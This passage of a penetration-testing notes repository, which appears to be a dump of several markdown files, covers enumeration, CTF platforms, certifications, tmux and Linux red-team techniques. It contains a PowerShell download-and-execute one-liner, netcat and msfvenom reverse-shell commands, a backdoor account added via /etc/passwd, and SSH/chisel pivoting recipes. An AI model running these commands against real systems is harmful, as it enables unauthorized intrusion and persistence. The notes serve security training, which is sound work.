IEX(New-Object Net.WebClient).DownloadString(http://) | powershell -noprofile - 25 | ``` 26 | 27 | Powershell reverse shell and exploit scripts: nishang [Ippsec:HacktheBox - Optimum](https://www.youtube.com/watch?v=kWTnVBIpNsE) 28 | 29 | Netcat reverse shell \(after uploading the binary!\): `nc64.exe -e cmd ` 30 | 31 | tools: [https://specterops.io/resources/research-and-development](https://specterops.io/resources/research-and-development) 32 | 33 | easy windows shell: unicorn.py [trustedsec/unicorn](https://github.com/trustedsec/unicorn) [HackTheBox - Arctic](https://www.youtube.com/watch?v=e9lVyFH7-4o) 34 | 35 | system information: `sysinfo` 36 | 37 | Get user id: `getuid` 38 | 39 | Powershell privilege escalation: 40 | 41 | * [PowerUp.ps1](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1) from PowerShellEmpire 42 | * Sherlock.ps1 43 | 44 | [fuzzbunch](https://github.com/peterpt/fuzzbunch): exploit tool similar to metasploit 45 | 46 | check what updates are installed: `type WindowsUpdate.log` 47 | 48 | net use share from linux \[like SimpleHTTPServer for Samba\]: `impacket-smbserver ''` 49 | 50 | -------------------------------------------------------------------------------- /basic-enumeration.md: -------------------------------------------------------------------------------- 1 | Basic Initial Enumeration 2 | 3 | ## Host Discovery 4 | 5 | ### Using nmap 6 | 7 | ``` 8 | nmap -sn -v -T4 $ip/$mask 9 | ``` 10 | 11 | ### Using netdiscover 12 | 13 | ``` 14 | netdiscover -r $ip/$mask 15 | ``` 16 | 17 | ### Using ping 18 | 19 | tab - windows 20 | ``` 21 | for /L %i in (1,1,255) do @ping.exe -n 1 -w 50 10.10.10.%i | findstr TTL 22 | ``` 23 | 24 | tab - linux 25 | 26 | ``` 27 | for x in (1..255); do ping -c 1 -w 50 10.10.10.x | grep TTL 28 | ``` 29 | 30 | Change the IP `10.10.10.` to match the network you are scanning. This is set up to scan a /24 network by default, and will require some customization to do other size networks. 31 | 32 | 33 | ## Port Enumeration 34 | 35 | ```bash 36 | ports=$(nmap -Pn -n -p- --min-rate=1000 -T4 10.10.10.189 | grep ^[0-9] | cut -d '/' -f1 | tr '\n' ',' | sed s/,$//) 37 | 38 | nmap -vvv -n -p $ports -sC -sV 39 | ``` 40 | 41 | if need full details scan: 42 | ```bash 43 | nmap -vvv --reason -sCV -Pn -A --osscan-guess --version-all -p $ports -oA host.nmap-full 44 | ``` 45 | 46 | ### Simple bash port scan script 47 | 48 | ```bash 49 | for ip in {1..254}; 50 | do for port in {1..65535}; 51 | do (echo >/dev/tcp/10.10.10.$ip/$port) >& /dev/null \ 52 | && echo "10.10.10.$ip:$port is open"; 53 | done; 54 | done; 55 | echo "Scan complete." 56 | ``` 57 | 58 | The IP range and ports to scan can of course be modified to fit the situation. Scanning all ports on a class C range will take awhile. Try not to do this as it is very noisy. 59 | -------------------------------------------------------------------------------- /hackers-rest.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Test 3 | --- 4 | 5 | # Test 6 | 7 | This is a test...More to come soon! 8 | 9 | -------------------------------------------------------------------------------- /hacking-methodology.md: -------------------------------------------------------------------------------- 1 | # Hacking Methodology 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | {% hint style="danger" %} 10 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 11 | {% endhint %} 12 | 13 | ## MITRE ATT\&CK 14 | 15 | {% embed url="https://attack.mitre.org" %} 16 | 17 | | [Initial Access](https://attack.mitre.org/tactics/TA0001) | [Execution](https://attack.mitre.org/tactics/TA0002) | [Persistence](https://attack.mitre.org/tactics/TA0003) | [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) | [Defense Evasion](https://attack.mitre.org/tactics/TA0005) | [Credential Access](https://attack.mitre.org/tactics/TA0006) | [Discovery](https://attack.mitre.org/tactics/TA0007) | [Lateral Movement](https://attack.mitre.org/tactics/TA0008) | [Collection](https://attack.mitre.org/tactics/TA0009) | [Command and Control](https://attack.mitre.org/tactics/TA0011) | [Exfiltration](https://attack.mitre.org/tactics/TA0010) | [Impact](https://attack.mitre.org/tactics/TA0040) | 18 | | --------------------------------------------------------- | ---------------------------------------------------- | ------------------------------------------------------ | --------------------------------------------------------------- | ---------------------------------------------------------- | ------------------------------------------------------------ | ---------------------------------------------------- | ----------------------------------------------------------- | ----------------------------------------------------- | -------------------------------------------------------------- | ------------------------------------------------------- | ------------------------------------------------- | 19 | 20 | ### Categories 21 | 22 | The hacking methodology categories align with the enterprise attack tactics in the MITRE ATT\&CK matrix. The categories are: 23 | 24 | * **Initial access** - Gaining initial entry to the target network, usually involving password-guessing, exploits, or phishing emails 25 | * **Execution** - Launching attacker tools and malicious code, including RATs and backdoors 26 | * **Persistence** - Creating autostart extensibility points (ASEPs) to remain active and survive system restarts 27 | * **Privilege escalation** - Obtaining higher permission levels for code by running it in the context of a privileged process or account 28 | * **Defense evasion** - Avoiding security controls by, for example, turning off security apps, deleting implants, and running rootkits 29 | * **Credential access** - Obtaining valid credentials to extend control over devices and other resources in the network 30 | * **Discovery** - Gathering information about important devices and resources, such as administrator computers, domain controllers, and file servers 31 | * **Lateral movement** - Moving between devices in the target network to reach critical resources or gain network persistence 32 | * **Collection** - Locating and collecting data for exfiltration 33 | * **Command and control** - Connecting to attacker-controlled network infrastructure to relay data or receive commands 34 | * **Exfiltration** - Extracting data from the network to an external, attacker-controlled location 35 | 36 | **** 37 | 38 | ## General methodology 39 | 40 | * Log all commands of the current session 41 | 42 | ``` 43 | script $session_name.log 44 | 45 | #when finished 46 | exit 47 | ``` 48 | * Use Joplin, OneNote, CherryTree or other notetaking program to document findings 49 | * Set the Target IP Address to the `$ip` system variable 50 | 51 | ``` 52 | export ip=target_ip 53 | ``` 54 | * Run `nmap -sCV` for all TCP and UDP ports 55 | * For every open port TCP/UDP 56 | * Find service and version 57 | * Find known service bugs 58 | * Find configuration issues 59 | * Do banner grabbing 60 | * Google/Web-search 61 | * Every unknown service/program 62 | * Every error message 63 | * Every URL path 64 | * Every parameter to find versions/apps/bugs 65 | * Every service version + exploit db 66 | * Every service version + vulnerability 67 | * `searchsploit` every service 68 | * If app has authentication: 69 | * User enumeration 70 | * Password brute force 71 | * Default credentials google search 72 | * Run nmap vuln scan 73 | * Run metasploit enum 74 | * Run metasploit exploits 75 | 76 | ## Privilege Escalation Standard Operating Procedures 77 | 78 | Proper and thorough enumeration is the key to a successful engagement. Privilege escalation is all about: 79 | 80 | * Collecting - Enumeration, more enumeration, and some more enumeration. 81 | * Processing - Sort through data, analyze, and prioritize. 82 | * Searching - Know what to search for and where to find the exploit code. 83 | * Adapting - Customize the exploit so it fits. Not every exploit works for every system "out of the box". 84 | * Trying - Get ready for (lots of) trial and error. 85 | 86 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 87 | -------------------------------------------------------------------------------- /hands-on-practice.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Sites and resources for gaining the most important experience: hands-on 4 | practical application. 5 | --- 6 | 7 | # Hands-on Practice 8 | 9 | ## **Capture The Flag (CTF)** 10 | In **cybersecurity**, a **Capture The Flag (CTF)** is a **hands-on competition** designed to simulate real-world hacking scenarios. Participant, who are often **security professionals, ethical hackers, students, or red teams**, attempt to solve technical challenges that test their **offensive and/or defensive skills**. 11 | 12 | ### **Types of CTF Competitions** 13 | 14 | CTFs can vary in format but typically fall into three main categories: 15 | 16 | 1. **Jeopardy-Style** – Players solve challenges in categories like **cryptography, reverse engineering, web exploitation, and forensics** to earn points. 17 | 2. **Attack-Defense** – Teams defend their own systems while attacking others, simulating **real-world red vs. blue team scenarios**. 18 | 3. **Boot2Root / Puzzle-Based** – Participants must gain root access to a vulnerable machine or solve multi-step hacking challenges. 19 | 20 | ### **CTFs for Cyber Training** 21 | 22 | For cybersecurity professionals, CTFs provide an opportunity to: 23 | 24 | - **Practice offensive security** techniques like **privilege escalation, exploit development, and lateral movement**. 25 | - **Learn real-world tactics** used by adversaries in penetration tests. 26 | - **Improve technical agility** in areas like **reverse engineering malware, bypassing security controls, and social engineering**. 27 | - **Enhance teamwork** in scenarios that mimic **cybercriminals** and **advanced persistent threats (APT)**. 28 | 29 | CTFs are also widely used for **cybersecurity education**, **hiring assessments**, and **upskilling professionals**. Many competitions, such as **DEFCON CTF, Hack The Box, and PicoCTF**, provide an immersive experience to sharpen security expertise. 30 | 31 | Here is a list of some of the more popular platforms for hands-on CTF training: 32 | 33 | | **Site** | **Description** | **CTF Type** | 34 | |---------|---------------|-------------| 35 | | [247CTF](https://247ctf.com/) | Provides unique challenge instances for each player, eliminating the need for VPNs or shared environments. Players can start, stop, and restart challenges at any time. | **Jeopardy-Style** | 36 | | [CTFtime](https://ctftime.org/) | A comprehensive archive of past and upcoming **Capture The Flag (CTF)** competitions, including team rankings, statistics, and event details. | **CTF Aggregator** (Tracks multiple formats) | 37 | | [OverTheWire Wargames](http://overthewire.org/wargames/) | Offers a variety of **security wargames** to help players learn and practice cybersecurity concepts in a structured, gamified environment. | **Puzzle-Based / Boot2Root** | 38 | | [OverTheWire Warzone](https://overthewire.org/warzone/) | A simulated **IPv4 Internet environment** where all connected devices are targets for hacking. Players can connect their own vulnerable systems for testing. | **Attack-Defense** | 39 | | [UnderTheWire](https://www.underthewire.tech/) | Focuses on **Windows PowerShell** training through interactive wargames, helping users develop scripting and automation skills. | **Jeopardy-Style** | 40 | | [Challenges.re](https://challenges.re/) | Created by Dennis Yurichev, this site focuses on **reverse engineering challenges**, complementing his book *Reverse Engineering for Beginners*. | **Jeopardy-Style (Reverse Engineering)** | 41 | | [ROP Emporium](https://ropemporium.com/) | Teaches **Return-Oriented Programming (ROP)** through structured challenges designed to improve exploit development skills. | **Puzzle-Based / Exploit Development** | 42 | | [PicoCTF](https://picoctf.com/) | A beginner-friendly **CTF competition** designed for students, featuring challenges in **reverse engineering, cryptography, and web security**. | **Jeopardy-Style** | 43 | | [CTF365](https://ctf365.com/) | A **cyber range** where users build and defend their own servers while attacking others, simulating real-world cybersecurity scenarios. | **Attack-Defense** | 44 | | [Hack The Box](https://www.hackthebox.eu/) | An **interactive penetration testing lab** with constantly updated challenges, including **real-world scenarios and CTF-style puzzles**. | **Boot2Root / Puzzle-Based** | 45 | | [VulnHub](https://www.vulnhub.com/) | Provides **vulnerable virtual machines** for hands-on security training, allowing users to practice penetration testing techniques. | **Boot2Root / Puzzle-Based** | 46 | | [Root Me](https://www.root-me.org/en/Challenges) | Offers a wide variety of **security challenges**, including **web exploitation, cryptanalysis, forensic analysis, and reverse engineering**. | **Jeopardy-Style** | 47 | | [Exploit Education](https://exploit.education/) | Formerly *Exploit Exercises*, this site provides **virtual machines and challenges** focused on **privilege escalation, exploit development, and debugging**. | **Boot2Root / Exploit Development** | 48 | | [Hack This](https://www.hackthis.co.uk/) | A platform for learning **hacking and network security**, featuring challenges that simulate real-world vulnerabilities. | **Jeopardy-Style** | 49 | | [W3Challs](https://w3challs.com/) | A **real-world hacking challenge** platform with no guessing or simulation, covering multiple offensive security topics. | **Jeopardy-Style** | 50 | | [Pwnable.kr](http://pwnable.kr/) | A **pwn-focused wargame** site offering challenges related to **binary exploitation, reverse engineering, and system hacking**. | **Boot2Root / Exploit Development** | 51 | | [Pwnable.tw](https://pwnable.tw/) | Similar to Pwnable.kr, this site provides **binary exploitation challenges** with a scoring system based on difficulty. | **Boot2Root / Exploit Development** | 52 | 53 | ## Certifications for Offensive Security Professionals 54 | 55 | Certifications are also available from many vendors to validate penetration testing, ethical hacking, and exploit development skills. These certifications help professionals demonstrate their expertise in network security, red teaming, and vulnerability assessment, making them valuable challenges to pursue. These can often help "get you in the door" when applying for jobs. 56 | 57 | Below is a table comparing some of the popular offensive security certifications: 58 | 59 | | **Vendor** | **Certification** | **Description** | **Price** | **Pros** | **Cons** | 60 | |------------|------------------|----------------|------------|----------|----------| 61 | | **Offensive Security** | **OSCP (Offensive Security Certified Professional)** | A **hands-on pentesting certification** requiring a **24-hour practical exam** and report writing. Focused on **real-world attack scenarios** using Kali Linux. | ~$1,599 | Highly respected, strong industry recognition, hands-on exam | Extremely challenging, steep learning curve, only "entry level" | 62 | | **Offensive Security** | **OSCE3 (Offensive Security Certified Expert)** | Advanced certification covering **exploit development, red teaming, and advanced pentesting techniques**. | ~$5,499 | Deep focus on **exploit development**, highly respected | Extremely difficult, requires OSCP-level expertise | 63 | | **Offensive Security** | **OSWE (Offensive Security Web Expert)** | Focuses on **white-box web application security**, requiring candidates to analyze source code and exploit vulnerabilities. The exam is **48 hours long**. | ~$1,499 | Highly specialized in **web app security**, strong industry recognition | Requires deep knowledge of **web application security and coding** | 64 | | **TCM Security** | **PNPT (Practical Network Penetration Tester)** | A **real-world pentesting exam** covering **Active Directory exploitation, lateral movement, and report writing**. | ~$399 | Affordable, realistic pentesting scenarios, includes reporting | Less recognized than OSCP, limited advanced exploitation | 65 | | **Pentester Academy** | **CRTP (Certified Red Team Professional)** | Specializes in **Active Directory attacks, privilege escalation, and lateral movement techniques**. | ~$249 | Strong Windows AD exploitation focus, affordable | Limited coverage of web and network pentesting | 66 | | **Hack The Box** | **CPTS (Certified Penetration Testing Specialist)** | A **hands-on pentesting certification** covering **network security, Active Directory exploitation, and web application attacks**. | ~$299 | Affordable, practical exam, good for beginners | Less recognized than OSCP, newer certification | 67 | | **GIAC (Global Information Assurance Certification)** | **GXPN (GIAC Exploit Researcher and Advanced Penetration Tester)** | Covers **exploit development, buffer overflows, and reverse engineering**. | ~$8,000 | Deep focus on **exploit development**, highly technical | Extremely expensive | 68 | | **eLearnSecurity (INE Security)** | **CPTS (Certified Penetration Testing Specialist)** | Covers **network security, web exploitation, and privilege escalation** with a **practical exam**. | ~$350 | Well-rounded pentesting coverage, hands-on exam | Less industry recognition compared to OSCP | 69 | | **eLearnSecurity (INE Security)** | **eJPT (eLearnSecurity Junior Penetration Tester)** | Entry-level pentesting certification covering **network security, web exploitation, and basic enumeration**. | ~$200 | Beginner-friendly, practical exam | Not recognized for senior pentesting roles | 70 | | **Mile2** | **CPTC (Certified Penetration Testing Consultant)** | Focuses on **enterprise-level pentesting**, including **report writing and compliance**. | ~$1,500 | Strong emphasis on **consulting and reporting**, good for senior roles | Less technical than OSCP, geared toward **business-oriented pentesting** | 71 | | **International Council of E-Commerce Consultants (EC-Council)** | **CEH (Certified Ethical Hacker)** | Covers **ethical hacking fundamentals**, tools, and methodologies via a **multiple-choice exam**. | ~$1,199 | Well-known globally, only for beginners | Not a practical exam, focuses more on theory than hands-on skills, terrible course material, not worth the price | 72 | 73 | 74 | ## Thanks 75 | 76 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 77 | -------------------------------------------------------------------------------- /linux-1/linux-hardening/tmux-screen-cheatsheet.md: -------------------------------------------------------------------------------- 1 | # TMUX/Screen Cheatsheet 2 | 3 | TMUX and screen are extremely useful tools for maintaining sessions through reverse tunnels and other fragile connections. They allow for reconnection of sessions that become detached (disconnected) where the process is still running but there was some sort of network interruption. 4 | 5 | They both have a very handy function where each window can be split either vertically or horizontally in to separate panes. I am not sure what the actual limit to the number of panes may be, but I regularly split my windows into four panes comfortably. 6 | 7 | Screen is fairly ubiquitous in most Linux distributions, however TMUX is a program that will likely have to be installed on the machine you are connecting to. Screen is fairly old and does not get feature updates anymore (as far as I am aware), while TMUX is newer and has many plugins which can be used to extend its functionality. Learning both will ensure you are ready no matter which may be present on the system you log into. 8 | 9 | {% hint style="info" %} 10 | **`^`** is shorthand for the **`CTRL`** key, so **`^b`** == **`CTRL + b`**. 11 | 12 | \----- 13 | 14 | **`^a`** is the default meta-key for **`screen`**, while **`^b`** is the default meta-key for **`TMUX`**. 15 | {% endhint %} 16 | 17 | ## Session Management 18 | 19 | | Action | TMUX | Screen | 20 | | ------------------------------------------------------------- | ---------------------------------------------------------------------------------------- | ------------------------------------------------------------------------- | 21 | | Start a new session |

tmux

tmux new

tmux new-session

| `screen` | 22 | | Create a new named session | `tmux new -s ` | | 23 | | Re-attach a (local) detached session |

tmux attach

tmux attach-session

| `screen -r` | 24 | | Re-attach an attached session (detaching it from elsewhere) |

tmux attach -d

tmux attach-session -d

| `screen -dr` | 25 | | Re-attach an attached session (keeping it attached elsewhere) |

tmux attach

tmux attach-session

| `screen -x` | 26 | | Detach from currently attached session |

^b d

^b :detach

|

^a d

^a ^d ^a :detach

| 27 | | Detach and log out | |

^a f

^a ^f

| 28 | | List sessions |

^b s

tmux ls tmux list-sessions

| `screen -ls` | 29 | 30 | ## Pane Management 31 | 32 | | Action | TMUX | Screen | 33 | | -------------------------------------- | ------- | -------- | 34 | | Split pane horizontally | `^b "` | `^a S` | 35 | | Split pane vertically | `^b %` | `^a \|` | 36 | | Switch to another pane | `^b o` | `^a tab` | 37 | | Kill the current pane | `^b x` | `^a X` | 38 | | Close all panes except the current one | `^b !` | `^a Q` | 39 | | Swap location of panes | `^b ^o` | N/A | 40 | | Show time | `^b t` | ----- | 41 | | Show numeric identifier for all panes | `^b q` | ----- | 42 | 43 | ## Window Management 44 | 45 | | Action | TMUX | Screen | 46 | | ---------------------------------- | --------------------------------------------------------------------------------------------- | ------------------------------------------------- | 47 | | Rename window |

^b , <new_name>

^b :rename-window <new_name>

| `^a A ` | 48 | | Create new window | `^b c` |

^a c

^a ^c

| 49 | | List windows | `^b w` | `^a w` | 50 | | List windows (with selection menu) | ----- | `^a "` | 51 | | Go to window $num | `^b $num` | `^a $num` | 52 | | Go to previously active window | `^b l` | `^a ^a` | 53 | | Go to next window | `^b n` | `^a n` | 54 | | Go to previous window | `^b p` | `^a p` | 55 | 56 | ## MISC 57 | 58 | | Action | TMUX | Screen | 59 | | ---------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------- | 60 | | See key bindings | `^b ?` | `^a ?` | 61 | | Enter "scroll mode" | `^b [` | `^a [` | 62 | | Enter "Vim mode" |

^b ]

Search with ?.

Hit [spacebar] to start copying text

Use ^b + ] to paste.

| | 63 | | Scroll up in "scroll mode" |

[page up]

[up arrow]

|

^b for page up

k for one line

| 64 | | Scroll down in "scroll mode" |

[page down]

[down arrow]

|

^f for page down

j for one line

| 65 | | Exit "scroll mode" | `q` | `ESC` | 66 | | Exit current shell | `^d` | `^d` | 67 | 68 | 69 | 70 | ### Ippsec Tmux Notes 71 | 72 | Config from [ippsec](https://www.youtube.com/watch?v=Lqehvpe\_djs). 73 | 74 | ``` 75 | #set prefix 76 | set -g prefix C-a 77 | bind C-a send-prefix 78 | unbind C-b 79 | 80 | set -g history-limit 100000 81 | set -g allow-rename off 82 | 83 | bind-key j command-prompt -p "Join pane from:" "join-pane -s '%%'" 84 | bind-key s command-prompt -p "Send pane to:" "joian-pane -t '%%'" 85 | 86 | set-window-option -g mode-keys vi 87 | 88 | run-shell /opt/tmux-logging/logging.tmux 89 | ``` 90 | 91 | First press the prefix `ctrl + b`(default, Ippsec changes it to Ctrl+a) then release the buttons and press the combination you want. 92 | 93 | Join panes: `prefix + s #` 94 | 95 | Zoom in/out to panes: `prefix + z` 96 | 97 | Kill session by tag:`tmux kill-session -t X` 98 | 99 | Kill pane: `prefix + &` 100 | 101 | #### tmux plugins: 102 | 103 | * tmux logging plugin (get this!!) can save log of tmux windows 104 | * [better mouse mode](https://github.com/NHDaly/tmux-better-mouse-mode) 105 | 106 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 107 | -------------------------------------------------------------------------------- /linux-1/linux-redteam/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: 'Sorted Linux notes, need to separate to different pages and reorganize' 3 | --- 4 | 5 | # Red Team Notes 6 | 7 | {% hint style="success" %} 8 | Hack Responsibly. 9 | 10 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 11 | {% endhint %} 12 | 13 | ## Linux 14 | 15 | Website for searching for shells through random programs such as `vi` "living off the land binaries": [GTFObins](https://gtfobins.github.io/) 16 | 17 | ## Remote Code Execution 18 | 19 | Run commands on remote system without a shell through SSH with a "Herefile". `HERE` can be anything, but it must begin and end with the same word. [https://www.cyberciti.biz/faq/linux-unix-osx-bsd-ssh-run-command-on-remote-machine-server/](https://www.cyberciti.biz/faq/linux-unix-osx-bsd-ssh-run-command-on-remote-machine-server/) 20 | 21 | ```text 22 | ssh @ << HERE 23 | 24 | 25 | HERE 26 | ``` 27 | 28 | ## Misc Linux 29 | 30 | Raw memory location so no files on disk: `/dev/shm/` 31 | 32 | list all running commands: 33 | 34 | ```bash 35 | ps -eo command` 36 | #change delimiter to \n instead of (loop by line): 37 | IFS=$'\n' 38 | #Then loop through each line in output: 39 | for i in $(ps -eo command); do echo $i; done 40 | ``` 41 | 42 | ### Cat file directly to clipboard 43 | 44 | [https://unix.stackexchange.com/questions/211817/copy-the-contents-of-a-file-into-the-clipboard-without-displaying-its-contents](https://unix.stackexchange.com/questions/211817/copy-the-contents-of-a-file-into-the-clipboard-without-displaying-its-contents) script to copy contents of file directly to clipboard; Save in PATH location then enjoy! 45 | 46 | ```text 47 | #! /bin/bash 48 | xclip -selection clipboard -i $@ 49 | ``` 50 | 51 | 'new' netstat: `ss -lnp | grep 9001` \#check if any connections on port 9001 52 | 53 | copy files to local machine without file transfer: 54 | 55 | ```bash 56 | base64 -w 0 /path/of/file/name.file 57 | #copy base64 then: 58 | echo -n | base64 -d > filename.file 59 | ``` 60 | 61 | pretty print JSON text in console \([https://www.howtogeek.com/529219/how-to-parse-json-files-on-the-linux-command-line-with-jq/](https://www.howtogeek.com/529219/how-to-parse-json-files-on-the-linux-command-line-with-jq/)\). Pipe the JSON output to `jq`. Example from NASA ISS API: `curl -s http://api.open-notify.org/iss-now.json | jq` 62 | 63 | ### Check encoding of a text file 64 | 65 | `vi -c 'let $enc = &fileencoding | execute "!echo Encoding: $enc" | q' ` check encoding of a text file \(needed especially when doing crypto with python, or cracking passwords with `rockyou.txt` - _hint: needs latin encoding!_\) [https://vim.fandom.com/wiki/Bash\_file\_encoding\_alias](https://vim.fandom.com/wiki/Bash_file_encoding_alias) \(how to make an alias for the above command\) 66 | 67 | 68 | 69 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 70 | 71 | -------------------------------------------------------------------------------- /linux-1/linux-redteam/persistance.md: -------------------------------------------------------------------------------- 1 | # Persistence 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | {% hint style="danger" %} 10 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 11 | {% endhint %} 12 | 13 | ## Cron 14 | 15 | ## Startup Scripts 16 | 17 | Add script to run at startup: `update-rc.d defaults` (needs 755 permissions) 18 | 19 | ## Accounts 20 | 21 | ### Add Account & Password to /etc/passwd 22 | 23 | * Generate password with `openssl passwd -1 -salt $username $password` 24 | * Add to `/etc/passwd` file which is in the format: 25 | * `$UserName:$generated_password:$UID:$GUID:$comment:$home_dir:$default_shell` 26 | * `$comment` is usually the user's Full Name. Check the `/etc/passwd` file to ensure you match local standards. 27 | * (assumes you have write privilege to this file!). 28 | 29 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 30 | -------------------------------------------------------------------------------- /linux-1/linux-redteam/pivoting-lateral-movement.md: -------------------------------------------------------------------------------- 1 | # Pivoting/Lateral Movement 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | {% hint style="danger" %} 10 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 11 | {% endhint %} 12 | 13 | ## SSH Tunneling 101 14 | 15 | ```bash 16 | # SSH local port forward to reach an_internal_server_ip:port via server_ip 17 | ssh tunneler@server_ip -p 2222 -L 1234:an_internal_server_ip:80 18 | # Now curl localhost:1234 will fetch an_internal_server_ip:80 which is reachable from server_ip only 19 | 20 | # dynamic port forward to create a SOCKS proxy to visit any_internal_server_ip 21 | ssh tunneler@server_ip -p 2222 -D 1080 22 | # next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from server_ip only 23 | 24 | # ProxyJump ssh to an_internal_host via ssh server_ip 25 | ssh -J tunneler@server_ip:2222 whistler@an_internal_host # which is only accessible from server_ip 26 | 27 | # SSH remote port forward to send traffic back to our local port from a port of server_ip 28 | ssh whistler@server_ip -p 2222 -L 58671:localhost:1234 # 29 | # this will listen on port 58671 of server_ip and tunnel the traffic back to us on loclahost:1234; nc -nlvp 1234 to receive for example 30 | 31 | # Chain ProxyJump + dynamic port forward to create a proxy of 2nd_box which is only accessible via 1st_box 32 | ssh -j firstuser@1st_box:2222 seconduser@2nd_box -D 1080 33 | # next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from 2nd_box only 34 | 35 | # bypass first time prompt when have non-interactive shell 36 | 37 | ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" 38 | ``` 39 | 40 | ### SSH reverse tunneling 41 | ```bash 42 | ssh -f -N -R 8000:10.3.3.14:80 -R 4443:10.3.3.14:443 -R 33306:10.3.3.14:3306 -R 33389:10.3.3.14:3389 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i key kali@192.168.19.57 43 | 44 | # kill with 45 | ps -C ssh 46 | kill -9 47 | ``` 48 | 49 | #### If you already have an SSH session 50 | 51 | ```bash 52 | -R 8081:172.24.0.2:80 # (on my Kali machine listen on 8081, get it from 172.24.0.2:80) 53 | # :8081<------------:80 54 | # Now you can access 172.24.0.2:80, which you didn't have direct access to 55 | 56 | 57 | -L 8083:127.0.0.1:8084 # (on your machine listen on 8083, send it to my Kali machine on 8084) 58 | # :8084<------------:8083<------------:XXXX 59 | # run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it 60 | 61 | 62 | For reverse shell: 63 | msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell 64 | Run it on 2nd remote target to get a shell on Kali 65 | ``` 66 | 67 | #### If you didn't have an SSH session 68 | 69 | First, SSH to your Kali from target machine 70 | 71 | On Kali: 72 | 73 | ```bash 74 | service ssh start 75 | # "add a user, give it /bin/false in /etc/passwd" 76 | ssh - -R 12345:192.168.122.228:5986 test@10.1.1.1 77 | ``` 78 | 79 | ## Port Forwarding (Single port to one port) 80 | 81 | ### Using Socat 82 | For linux 83 | 84 | Forward your 8083 to 10.39.0.2:443 85 | 86 | ```bash 87 | ./socat TCP4-LISTEN:8083,fork TCP4:10.39.0.2:443 88 | ``` 89 | 90 | ### Using Chisel 91 | Most platforms 92 | 93 | Remote static tunnels "port to port": 94 | 95 | ```bash 96 | #On Kali "reverse proxy listener": 97 | ./chisel server -p 8000 -reverse 98 | 99 | #General command: 100 | ./chisel client $YOUR_IP:$YOUR_CHISEL_SERVER_PORT L/R:[$YOUR_LOCAL_IP]:$TUNNEL_LISTENING_PORT:$TUNNEL_TARGET:$TUNNEL_PORT 101 | ``` 102 | 103 | #### Remote tunnels "access IP:PORT you couldn't access before": 104 | 105 | ```bash 106 | #On Target: 107 | ./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80 108 | ``` 109 | 110 | #### Local tunnels "listen on the target for something, and send it to us": 111 | 112 | ```bash 113 | #On Target: 114 | ./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003 115 | ``` 116 | 117 | ### Using Metasploit 118 | Get meterpreter session, then: 119 | 120 | ```bash 121 | portfwd add -l 4445 -p 4443 -r 10.1.1.1 122 | # Use -R to make it reverse 123 | ``` 124 | 125 | ### Using Plink.exe 126 | Just like SSH, but Windows only. Part of the Putty toolset. 127 | 128 | ```bash 129 | #On Attacker 130 | service ssh start 131 | cp /usr/share/windows-binaries/plink.exe #to the target machine 132 | ``` 133 | 134 | ```bash 135 | #On Target: 136 | plink.exe 10.10.10.123 -P 22 -C -N -L 0.0.0.0:4445:10.10.10.123:4443 -l $KALIUSER -pw $PASS 137 | ``` 138 | 139 | ## Dynamic Port Forwarding (Single port to any remote port) 140 | 141 | * setup proxychains with socks5 on 127.0.0.1:1080 142 | * Or set up socks5 proxy on firefox 143 | > For nmap use `-Pn -sT` or use tcp scanner in msf 144 | 145 | ```sh 146 | ssh -i bobs.key -p 2222 bob@10.10.10.123 -D1080 147 | ``` 148 | 149 | ### Using Chisel 150 | 151 | ```bash 152 | #On Kali: 153 | ./chisel server -p 8000 -reverse 154 | 155 | #On Target: 156 | ./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080 157 | ./chisel server -p 8001 --socks5 158 | 159 | #On Kali: 160 | ./chisel client 127.0.0.1:8001 socks 161 | ``` 162 | 163 | ### Using Metasploit 164 | 165 | * Get meterpreter session 166 | * Auto route (multi/manage/autoroute) 167 | * Start socks proxy (auxiliary/server/socks4a) 168 | 169 | ## Forward ports using built-in firewall 170 | 171 | ### Using iptables 172 | 173 | To set up a port forwarder using iptables run the below commands as root (or with sudo). 174 | 175 | ```bash 176 | echo '1' > /proc/sys/net/ipv4/conf/eth0/forwarding 177 | iptables -t nat -A PREROUTING -p tcp -i eth0 --dport 